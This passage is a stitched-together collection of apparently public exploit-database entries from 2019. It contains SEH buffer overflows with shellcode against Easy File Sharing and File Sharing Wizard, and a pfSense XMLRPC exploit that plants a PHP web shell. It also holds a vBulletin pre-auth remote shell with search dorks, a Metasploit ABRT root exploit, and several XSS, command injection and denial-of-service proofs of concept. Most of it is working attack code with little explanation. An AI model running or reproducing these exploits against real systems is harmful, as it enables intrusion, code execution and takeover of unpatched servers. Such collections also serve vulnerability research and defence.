"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

# found bad chars - "\x00\x0a\x0d"

shellcode =  ""
shellcode += "\xbb\xc4\x1c\xb2\xd3\xdd\xc2\xd9\x74\x24\xf4\x5e"
shellcode += "\x2b\xc9\xb1\x31\x31\x5e\x13\x83\xc6\x04\x03\x5e"
shellcode += "\xcb\xfe\x47\x2f\x3b\x7c\xa7\xd0\xbb\xe1\x21\x35"
shellcode += "\x8a\x21\x55\x3d\xbc\x91\x1d\x13\x30\x59\x73\x80"
shellcode += "\xc3\x2f\x5c\xa7\x64\x85\xba\x86\x75\xb6\xff\x89"
shellcode += "\xf5\xc5\xd3\x69\xc4\x05\x26\x6b\x01\x7b\xcb\x39"
shellcode += "\xda\xf7\x7e\xae\x6f\x4d\x43\x45\x23\x43\xc3\xba"
shellcode += "\xf3\x62\xe2\x6c\x88\x3c\x24\x8e\x5d\x35\x6d\x88"
shellcode += "\x82\x70\x27\x23\x70\x0e\xb6\xe5\x49\xef\x15\xc8"
shellcode += "\x66\x02\x67\x0c\x40\xfd\x12\x64\xb3\x80\x24\xb3"
shellcode += "\xce\x5e\xa0\x20\x68\x14\x12\x8d\x89\xf9\xc5\x46"
shellcode += "\x85\xb6\x82\x01\x89\x49\x46\x3a\xb5\xc2\x69\xed"
shellcode += "\x3c\x90\x4d\x29\x65\x42\xef\x68\xc3\x25\x10\x6a"
shellcode += "\xac\x9a\xb4\xe0\x40\xce\xc4\xaa\x0e\x11\x5a\xd1"
shellcode += "\x7c\x11\x64\xda\xd0\x7a\x55\x51\xbf\xfd\x6a\xb0"
shellcode += "\x84\xfc\x9b\x09\x10\x68\x02\xf8\x59\xf4\xb5\xd6"
shellcode += "\x9d\x01\x36\xd3\x5d\xf6\x26\x96\x58\xb2\xe0\x4a"
shellcode += "\x10\xab\x84\x6c\x87\xcc\x8c\x0e\x46\x5f\x4c\xff"
shellcode += "\xed\xe7\xf7\xff"

# Log data, item 69
# Address=0BADF00D
# Message= 0x10000000 | 0x10050000 | 0x00050000 | False  | False   | False |  False   | False  | -1.0- [ImageLoad.dll] (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll)

# Log data, item 24
# Address=100195F2
# Message=  0x100195f2 : pop esi # pop ecx # ret  |  {PAGE_EXECUTE_READ} [ImageLoad.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll)

nseh = "\xEB\x06\x90\x90"
seh = "\xF2\x95\x01\x10"

payload  = "A" * 4059
payload += nseh
payload += seh
payload += "\x90" * 16
payload += shellcode
payload += "D" *4000

# SEH chain of main thread, item 1
# Address=46336646
# SE handler=*** CORRUPT ENTRY ***

# Log data, item 34
# Address=0BADF00D
# Message=    SEH record (nseh field) at 0x0018a938 overwritten with normal pattern : 0x46336646 (offset 4059), followed by 933 bytes of cyclic data after the handler
# [*] Exact match at offset 4059

try:
    evilCreate =open("exploit.txt","w")
    print("""
    Easy File Sharing web server SEH overflow
""")
    print("[x] Creating malicious file")
    evilCreate.write(payload)
    evilCreate.close()
    print("[x] Malicious file create")
    print("[x] Go to user accounts and add a new user with malicious name")
    print("[x] Watch the program crash")
except:
    print("[!] File failed to be created")

import socket
from struct import *

# Exploit Title: File sharing wizard 'post' remote SEH overflow
# Date: 9/23/2019
# Exploit Author: x00pwn
# Software Link: https://file-sharing-wizard.soft112.com/
# Version: 1.5.0
# Tested on: Windows 7
# CVE : CVE-2019-16724

# File-sharing-wizard-seh

#----------------------------------------------#
# Bad characters: \x00        #
# SEH value:  0x909032EB  (JMP short)    #
# NSEH value: 0x7c38a67f (POP POP RET)  #
#----------------------------------------------#

#  Assigned CVE ID : CVE-2019-16724

victim_host = "10.0.0.17"
victim_port = 80

# msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -v shellcode EXITFUNC=seh
shellcode =  ""
shellcode += "\xd9\xc7\xd9\x74\x24\xf4\xba\x65\x1d\x84\xe1\x5f"
shellcode += "\x29\xc9\xb1\x31\x31\x57\x18\x03\x57\x18\x83\xef"
shellcode += "\x99\xff\x71\x1d\x89\x82\x7a\xde\x49\xe3\xf3\x3b"
shellcode += "\x78\x23\x67\x4f\x2a\x93\xe3\x1d\xc6\x58\xa1\xb5"
shellcode += "\x5d\x2c\x6e\xb9\xd6\x9b\x48\xf4\xe7\xb0\xa9\x97"
shellcode += "\x6b\xcb\xfd\x77\x52\x04\xf0\x76\x93\x79\xf9\x2b"
shellcode += "\x4c\xf5\xac\xdb\xf9\x43\x6d\x57\xb1\x42\xf5\x84"
shellcode += "\x01\x64\xd4\x1a\x1a\x3f\xf6\x9d\xcf\x4b\xbf\x85"
shellcode += "\x0c\x71\x09\x3d\xe6\x0d\x88\x97\x37\xed\x27\xd6"
shellcode += "\xf8\x1c\x39\x1e\x3e\xff\x4c\x56\x3d\x82\x56\xad"
shellcode += "\x3c\x58\xd2\x36\xe6\x2b\x44\x93\x17\xff\x13\x50"
shellcode += "\x1b\xb4\x50\x3e\x3f\x4b\xb4\x34\x3b\xc0\x3b\x9b"
shellcode += "\xca\x92\x1f\x3f\x97\x41\x01\x66\x7d\x27\x3e\x78"
shellcode += "\xde\x98\x9a\xf2\xf2\xcd\x96\x58\x98\x10\x24\xe7"
shellcode += "\xee\x13\x36\xe8\x5e\x7c\x07\x63\x31\xfb\x98\xa6"
shellcode += "\x76\xfd\x69\x7b\x62\x6a\xd0\xee\xcf\xf6\xe3\xc4"
shellcode += "\x13\x0f\x60\xed\xeb\xf4\x78\x84\xee\xb1\x3e\x74"
shellcode += "\x82\xaa\xaa\x7a\x31\xca\xfe\x18\xd4\x58\x62\xf1"
shellcode += "\x73\xd9\x01\x0d"

nseh = pack ('<I',0x909032EB) # Short jump forward 32 places into NOP sled
seh = pack('I',0x7c38a67f) # POP POP RET

# 0x7c38a67f : pop ecx # pop ecx # ret  |  {PAGE_EXECUTE_READ} [MSVCR71.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files (x86)\File Sharing Wizard\bin\MSVCR71.dll)

exploit_payload  = "A" * 1040
exploit_payload += nseh # JMP short
exploit_payload += seh # POPPOPRET
exploit_payload += "\x90" * 100 # NOPSLED
exploit_payload += shellcode # popping calc.exe
exploit_payload += "D" *(5000 - len(exploit_payload))

payload_header  = "POST " + exploit_payload
payload_header +=" HTTP/1.0\r\n\r\n"

# overflowed SEH handler - 42386942 : [*] Exact match at offset 1044

try:
print("""
--------------------------------
CVE-2019-16724 proof of concept
File sharing wizard SEH overflow
--------------------------------
""")
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("[x] Setting up a socket connection")
expl.connect((victim_host, victim_port))
print("[x] Establishing a connection to the victim")
expl.send(payload_header)
print("[x] Sending ")
except:
print("[!] Error establishing a connection")
print("[!] Error sending exploit")

# Exploit Title: Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection
# Date: 23/09/2018
# Author: Nassim Asrir
# Vendor Homepage: https://www.pfsense.org/
# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/
# CVE: CVE-2019-16701
# Tested On: Windows 10(64bit) | Pfsense 2.3.4 / 2.4.4-p3
######################################################################################################

1 : About Pfsense:
==================

pfSense is a free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more.

2 : Technical Analysis:
=======================

The pfsense allow users (uid=0) to make remote procedure calls over HTTP (XMLRPC) and the XMLRPC contain some critical methods which allow any authenticated user/hacker to execute OS commands.

XMLRPC methods:

pfsense.exec_shell
pfsense.exec_php
pfsense.filter_configure
pfsense.interfaces_carp_configure
pfsense.backup_config_section
pfsense.restore_config_section
pfsense.merge_config_section
pfsense.merge_installedpackages_section_xmlrpc
pfsense.host_firmware_version
pfsense.reboot
pfsense.get_notices
system.listMethods
system.methodHelp
system.methodSignature

As we see in the output we have two interesting methods: pfsense.exec_shell and pfsense.exec_php.

2 : Static Analysis:
====================

In the static analysis we will analysis the xmlrpc.php file. 

Line (73 - 82)

This code check if the user have enough privileges.

$user_entry = getUserEntry($username);
    /*
     * admin (uid = 0) is allowed 
     * or regular user with necessary privilege
     */
    if (isset($user_entry['uid']) && $user_entry['uid'] != '0'&&
        !userHasPrivilege($user_entry, 'system-xmlrpc-ha-sync')) {
      log_auth("webConfigurator authentication error for '" .
          $username . "' from " . $this->remote_addr .
" not enough privileges");


Line (137 - 146)

This part of code is the interest for us.

As we can see, first we have a check for auth then we have the dangerous function (eval) which take as parametere ($code).

  public function exec_php($code) {
    $this->auth();

    eval($code);
    if ($toreturn) {
      return $toreturn;
    }

    return true;
  }

Line (155 - 160)

In this part of code also we have a check for auth then the execution for ($code)

  public function exec_shell($code) {
    $this->auth();

    mwexec($code);
    return true;
  }

3 - Exploit:
============

#!/usr/bin/env python

import argparse
import requests
import urllib2
import time
import sys
import string
import random

parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Target Uri https://127.0.0.1")
parser.add_argument("--password", help = "pfsense Password")
args = parser.parse_args()

rhost = args.rhost
password = args.password
print ""

print "[+] CVE-2019-16701 - Pfsense - Remote Code Injection"
print ""
print "[+] Author: Nassim Asrir"
print ""

command = "<?xml version='1.0' encoding='iso-8859-1'?>"
command += "<methodCall>"
command += "<methodName>pfsense.host_firmware_version</methodName>"
command += "<params>"
command += "<param><value><string>"+password+"</string></value></param>"
command += "</params>"
command += "</methodCall>"

stage1 = rhost + "/xmlrpc.php"

page = urllib2.urlopen(stage1, data=command).read()

print "[+] Checking Login Creds"


if "Authentication failed" in page:

  print "[-] Wrong password :("
  sys.exit(0)
else:

  random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(32)])

  print "[+] logged in successfully :)"
  print "[+] Generating random file "+random+".php"
  print "[+] Sending the exploit ....."


  command = "<?xml version='1.0' encoding='iso-8859-1'?>"
  command += "<methodCall>"
  command += "<methodName>pfsense.exec_php</methodName>"
  command += "<params>"
  command += "<param><value><string>"+password+"</string></value></param>"
  command += "<param><value><string>exec('echo \\'<pre> <?php $res = system($_GET[\"cmd\"]); echo $res ?> </pre>\\'> /usr/local/www/"+random+".php');</string></value></param>"
  command += "</params>"
  command += "</methodCall>"

stage1 = rhost + "/xmlrpc.php"

page = urllib2.urlopen(stage1, data=command).read()

final = rhost+"/"+str(random)+".php"

check = urllib2.urlopen(final)

print "[+] Checking ....."

if check.getcode() == 200:

  print "[+] Yeah! You got your shell: " + final+"?cmd=id"
else:

  print "[+] Sorry :( Shell not found check the path"

Microsoft SharePoint 2013 SP1 Stored XSS Vulnerability


Vendor: Microsoft Corporation
Product web page: https://www.microsoft.com
Affected version: 2013 SP1

Summary: SharePoint is a web-based collaborative platform that
integrates with Microsoft Office. Launched in 2001, SharePoint
is primarily sold as a document management and storage system,
but the product is highly configurable and usage varies substantially
among organizations.

Desc: A cross-site-scripting (XSS) vulnerability exists when Microsoft
SharePoint Server does not properly sanitize a specially crafted web
request to an affected SharePoint server. An authenticated attacker
could exploit the vulnerability by sending a specially crafted request
to an affected SharePoint server. The attacker who successfully exploited
the vulnerability could then perform cross-site scripting attacks on
affected systems and run script in the security context of the current
user. The attacks could allow the attacker to read content that the
attacker is not authorized to read, use the victim's identity to take
actions on the SharePoint site on behalf of the user, such as change
permissions and delete content, and inject malicious content in the
browser of the user.

Sharepoint 2013 SP1 allows users to upload files to the platform, but
does not correctly sanitize the filename when the files are listed. An
authenticated user that has the rights to upload files to the SharePoint
platform, is able to exploit a Stored Cross-Site Scripting vulnerability
in the filename. The filename is reflected in the attribute 'aria-label'
of the following HTML tag.

Tested on: Microsoft Windows Server 2016
           Microsoft Sharepoint 2013 SP1


Vulnerability discovered by Davide Cioccia
                            @zeroscience


Advisory ID: ZSL-2019-5533
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5533.php

MSRC: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1262
CVE ID: CVE-2019-1262
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1262

--


PoC request:


POST /FOLDER/_layouts/15/Upload.aspx?List={689D112C-BDAA-4B05-B0CB-0DFB36CF0649}&RootFolder=&IsDlg=1 HTTP/1.1
Host: vulnerable_sharepoint_2013
Connection: close
Content-Length: 31337
Cache-Control: max-age=0
Authorization: Negotiate YIIV9gYGKwYBBQUCo........................JBAq39IdJh3yphI1uHbz/jbQ==
Origin: https://vulnerable_sharepoint_2013.tld
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryewNI1MC6qaHDB50n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Sec-Fetch-Mode: nested-navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,it-IT;q=0.8,it;q=0.7,nl;q=0.6
Cookie: ...

------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOWebPartPage_PostbackSource"


------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOTlPn_SelectedWpId"


------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOTlPn_View"

0
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOTlPn_ShowSettings"

False
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOGallery_SelectedLibrary"


------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOGallery_FilterString"


------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOTlPn_Button"

none
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__EVENTTARGET"

ctl00$PlaceHolderMain$ctl00$RptControls$btnOK
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__EVENTARGUMENT"


------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_DisplayModeName"

Browse
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_ExitingDesignMode"

false
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOWebPartPage_Shared"


------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOLayout_LayoutChanges"


------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOLayout_InDesignMode"


------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_OldDisplayModeName"

Browse
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_StartWebPartEditingName"

false
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="MSOSPWebPartManager_EndWebPartEditing"

false
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="_maintainWorkspaceScrollPosition"

0
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__REQUESTDIGEST"

[DIGEST]

------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__VIEWSTATE"

[VIEWSTATE]

------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"

E6912F23
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__SCROLLPOSITIONX"

0
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__SCROLLPOSITIONY"

0
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="__EVENTVALIDATION"



------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="destination"

[DESTINATION_FOLDER]
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$InputFile"; filename="' onmouseover=alert(document.cookie) '.jpg"
Content-Type: image/jpeg


ZSL
------WebKitFormBoundaryewNI1MC6qaHDB50n
Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$OverwriteSingle"

on
------WebKitFormBoundaryewNI1MC6qaHDB50n--

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'ABRT sosreport Privilege Escalation',
'Description'    => %q{
        This module attempts to gain root privileges on RHEL systems with
        a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
        as the crash handler.

        `sosreport` uses an insecure temporary directory, allowing local users
        to write to arbitrary files (CVE-2015-5287). This module uses a symlink
        attack on `/var/tmp/abrt/cc-*$pid/` to overwrite the `modprobe` path
        in `/proc/sys/kernel/modprobe`, resulting in root privileges.

        Waiting for `sosreport` could take a few minutes.

        This module has been tested successfully on:

        abrt 2.1.11-12.el7 on RHEL 7.0 x86_64; and
        abrt 2.1.11-19.el7 on RHEL 7.1 x86_64.
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'rebel', # Discovery and sosreport-rhel7.py exploit
'bcoles' # Metasploit
        ],
'DisclosureDate' => '2015-11-23',
'Platform'       => ['linux'],
'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
'SessionTypes'   => ['shell', 'meterpreter'],
'Targets'        => [[ 'Auto', {} ]],
'References'     =>
        [
          ['BID', '78137'],
          ['CVE', '2015-5287'],
          ['EDB', '38832'],
          ['URL', 'https://www.openwall.com/lists/oss-security/2015/12/01/1'],
          ['URL', 'https://access.redhat.com/errata/RHSA-2015:2505'],
          ['URL', 'https://access.redhat.com/security/cve/CVE-2015-5287'],
          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1266837']
        ]
    ))
    register_options [
      OptInt.new('TIMEOUT', [true, 'Timeout for sosreport (seconds)', '600'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def base_dir
    datastore['WritableDir']
  end

  def timeout
    datastore['TIMEOUT']
  end

  def check
    kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern'
    unless kernel_core_pattern.include? 'abrt-hook-ccpp'
      vprint_error 'System is not configured to use ABRT for crash reporting'
      return CheckCode::Safe
    end
    vprint_good 'System is configured to use ABRT for crash reporting'

    if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive'
      vprint_error 'abrt-ccp service not running'
      return CheckCode::Safe
    end
    vprint_good 'abrt-ccpp service is running'

    # Patched in 2.1.11-35.el7
    pkg_info = cmd_exec('yum list installed abrt | grep abrt').to_s
    abrt_version = pkg_info[/^abrt.*$/].to_s.split(/\s+/)[1]
    if abrt_version.blank?
      vprint_status 'Could not retrieve ABRT package version'
      return CheckCode::Safe
    end
    unless Gem::Version.new(abrt_version) < Gem::Version.new('2.1.11-35.el7')
      vprint_status "ABRT package version #{abrt_version} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "ABRT package version #{abrt_version} is vulnerable"

    unless command_exists? 'python'
      vprint_error 'python is not installed'
      return CheckCode::Safe
    end
    vprint_good 'python is installed'

    CheckCode::Appears
  end

  def upload_and_chmodx(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    chmod path
    register_file_for_cleanup path
  end

  def exploit
    unless check == CheckCode::Appears
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    exe_data = ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2015-5287', 'sosreport-rhel7.py')
    exe_name = ".#{rand_text_alphanumeric 5..10}"
    exe_path = "#{base_dir}/#{exe_name}"
    upload_and_chmodx exe_path, exe_data

    payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
    upload_and_chmodx payload_path, generate_payload_exe

    register_file_for_cleanup '/tmp/hax.sh'

    print_status "Launching exploit - This might take a few minutes (Timeout: #{timeout}s) ..."
    output = cmd_exec "echo \"#{payload_path}& exit\" | #{exe_path}", nil, timeout
    output.each_line { |line| vprint_status line.chomp }
  end
end

#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
#
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"

import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:
     try:
          cmd = raw_input("vBulletin$ ")
          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
          r = requests.post(url = sys.argv[1], data = params)
          if r.status_code == 200:
               print r.text
          else:
               sys.exit("Exploit failed! :(")
     except KeyboardInterrupt:
          sys.exit("\nClosing shell...")
     except Exception, e:
          sys.exit(str(e))

# Exploit Title: SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service
# Date: 2019-20-09
# Exploit Author: Emilio Revelo
# Vendor Homepage: http://www.nsauditor.com/
# Software Link : http://www.nsauditor.com/downloads/spotie_setup.exe
# Tested on: Windows 10 Pro x64 es
# Version: 2.9.5

# Steps to produce the DoS: 

# 1.- Run perl script : perl SpotIE.pl
# 2.- Open SpotIE.txt and copy the content to clipboard
# 3.- Open SpotIE Internet Explorer Password Recovery
# 4.- Navigate to Register -> Enter the registration name and key below...
# 5.- Paste ClipBoard on "Key:"
# 7.- Ok
# 8.- Observe the program crash.

#!/usr/local/bin/perl

use strict;
use warnings;

my $filename = 'SpotIE.txt';
open(my $fh, '>', $filename) or die "Could not open file '$filename' $!";
print $fh "E"x256;
close $fh;
print "Done!\n";
print "File: SpotIE.txt\n"

# Exploit Title: WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting
# Date: 2019-09-10
# Exploit Author: strider
# Software Link: https://github.com/anttiviljami/wp-server-log-viewer
# Version: 1.0
# Tested on: Debian 10 Buster x64 / Kali Linux
# CVE : None

====================================[Description]====================================
This plugin allows you to add logfiles via wp-admin. The problem here is that the file paths are stored unfiltered/unescaped. This gives the possibility of a persistent XSS attack.


====================================[Codepart]====================================

if( isset( $_GET['action'] ) && 'new' === $_GET['action'] && isset( $_GET['logpath'] ) ) {
      // new log was added
      $logs = get_option( 'server_logs' );
      if( is_null( $logs ) ) {
        $logs = [];
      }

      $log = trim( $_GET['logpath'] ); //only trimmed string no escaping
      $logs[] = $log; //here the log will be added without security checks
      $logs = array_values( $logs );

      $index = array_search( $log, $logs );

      update_option( 'server_logs', $logs );

      wp_safe_redirect( admin_url('tools.php?page=wp-server-log-viewer&log=' . $index) );
    }



====================================[Proof of Concept]====================================
Add new log file to the plugin.
paste this exploit into the form and submit it.

<img src=# onerror=alert(document.cookie);>log.txt

It tries to render an image and triggers the onerror event and prints the cookie. in the tab you see the log.txt

# Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
# Date: 2019-09-13
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
# Version: 0.0.17
# Tested on: Kali Linux 2, Windows 10. 
# CVE : CVE-2019-5485

#!/usr/bin/python

import requests

target = "http://TARGET:3420"
cmd = r"touch /tmp/poc.txt"
json = '{"repository":{"name": "Diasporrra\'; %s;\'"}}'% cmd
r = requests.post(target, json)

print "Done."

# Exploit Title: YzmCMS 5.3 - 'Host' Header Injection
# Exploit Author: Debashis Pal
# Vendor Homepage: http://www.yzmcms.com/
# Source: https://github.com/yzmcms/yzmcms
# Version: YzmCMS V5.3
# CVE : N/A
# Tested on: Windows 7 SP1(64bit),XAMPP: 7.3.9

#About YzmCMS
==============
YzmCMS is a lightweight open source content management system that uses OOP (Object Oriented) to develop its own framework.

#Vulnerability 
===============
Host Header Injection.


#PoC 
=====
#YzmCMS V5.3 Access Path: TARGET/yzmcms/

curl http://TARGET/yzmcms/ -H "Host: www.google.com"

//sample output start

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>YzmCMS - 演示站</title>
<link href="http://www.google.com/yzmcms/common/static/css/default_common.css" rel="stylesheet" type="text/css" />
<link href="http://www.google.com/yzmcms/common/static/css/default_index.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/jquery-1.8.2.min.js"></script>
<script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/js.js"></script>
<script type="text/javascript" src="http://www.google.com/yzmcms/common/static/js/koala.min.1.5.js"></script> <!-- 焦点图js -->
<meta name="keywords" content="yzmcms,YzmCMS演示站,yzmcms站点" />
<meta name="description" content="本站是yzmcms演示站点" />
<meta http-equiv="mobile-agent" content="format=xhtml;url=http://TARGET/yzmcms/index.php?m=mobile">
<script type="text/javascript">if(window.location.toString().indexOf('pref=padindex') != -1){}else{if(/AppleWebKit.*Mobile/i.test(navigator.userAgent) || (/MIDP|SymbianOS|NOKIA|SAMSUNG|LG|NEC|TCL|Alcatel|BIRD|DBTEL|Dopod|PHILIPS|HAIER|LENOVO|MOT-|Nokia|SonyEricsson|SIE-|Amoi|ZTE/.test(navigator.userAgent))){if(window.location.href.indexOf("?mobile")<0){try{if(/Android|Windows Phone|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent)){window.location.href="http://TARGET/yzmcms/index.php?m=mobile";}else if(/iPad/i.test(navigator.userAgent)){}else{}}catch(e){}}}}</script>
</head>
<body>
<!--mini登陆条-->
<div id="head_login">
<div class="w1000">
<div id="mini">
<a href="http://www.google.com/yzmcms/member/index/register.html" target="_blank">注册</a> <a href="http://www.google.com/yzmcms/member/index/login.html"  target="_blank">登录</a>
</div>
欢迎光临本站！
</div>
</div>
<!--网站容器-->
<div id="container">
<div id="header">
<div id="logo">
<a href="http://TARGET/yzmcms/"><img src="http://www.google.com/yzmcms/common/static/images/logo.png" title="YzmCMS - 演示站" alt="YzmCMS - 演示站"></a>
</div>
<div id="search">
<form method="get" action="http://www.google.com/yzmcms/index.php" target="_blank">
<div id="searchtxt" class="searchtxt">
<div class="searchmenu">


//sample output End


#Solution
==========
Don’t trust the host header. Only allow whitelist hostnames. 


#Disclosure Timeline
====================
Vulnerability Discover Date: 18-Sep-2019
Vulnerability Notification To vendor via Email: 18-Sep-2019, no responds
Open issue in github : 22-Sep-2019, no responds
Submit exploit-db : 25-Sep-2019


#Disclaimer
==========
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.